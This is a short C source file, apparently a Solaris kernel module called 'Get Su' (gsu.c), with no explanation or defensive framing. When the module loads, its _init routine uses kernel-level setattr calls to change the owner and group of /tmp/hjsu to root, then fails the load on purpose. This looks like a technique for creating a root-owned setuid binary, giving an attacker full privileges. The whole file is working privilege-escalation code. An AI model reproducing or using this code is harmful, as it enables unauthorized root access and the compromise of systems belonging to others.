/*
 * Copyright (C) 2001-2002 by jerryhj.
 */
#pragma ident "@(#)$Id: gsu.c,v 0.0.0.1 2002/05/24 $"

#include <sys/modctl.h>
#include <sys/sunddi.h>
#include <sys/errno.h>
#include <sys/vfs.h>

static int
namesetattr(char *fnamep, enum symfollow followlink, vattr_t *vap, int flags)
{
	vnode_t *vp;
	int error = 0;

	if (error = lookupname(fnamep, UIO_SYSSPACE, followlink, NULLVPP, &vp)) {
		cmn_err(CE_CONT,"Get Su: 1.errno = %d\n",error); 	
		return error;
	}
	if (vp->v_vfsp->vfs_flag & VFS_RDONLY) {
		cmn_err(CE_CONT,"Get Su: 2.errno = %d\n",error); 	
		error = EROFS;
	} else if (error = VOP_SETATTR(vp, vap, flags, CRED()/** kcred **/)) {
		cmn_err(CE_CONT,"Get Su: 3.errno = %d\n",error); 	
	}
	VN_RELE(vp);
	return (error);
}

static int
chown(char *fname, uid_t uid, gid_t gid)
{
	struct vattr vattr;

	if (uid < -1 || uid > MAXUID || gid < -1 || gid > MAXUID)
		return EINVAL;
	vattr.va_uid = uid;
	vattr.va_gid = gid;
	vattr.va_mask = 0;
	if (vattr.va_uid != -1)
		vattr.va_mask |= AT_UID;
	if (vattr.va_gid != -1)
		vattr.va_mask |= AT_GID;
	return (namesetattr(fname, FOLLOW, &vattr, 0));
}

_init()
{
	chown("/tmp/hjsu", 0, 0);
/**
	cmn_err(CE_CONT,"Get Su: I got here.\n"); 	
**/
	return -1;
}


_info(struct modinfo *modinfop)
{
/**
	cmn_err(CE_CONT,"Get Su: I got here[info?].\n"); 	
**/
	return -1;
}
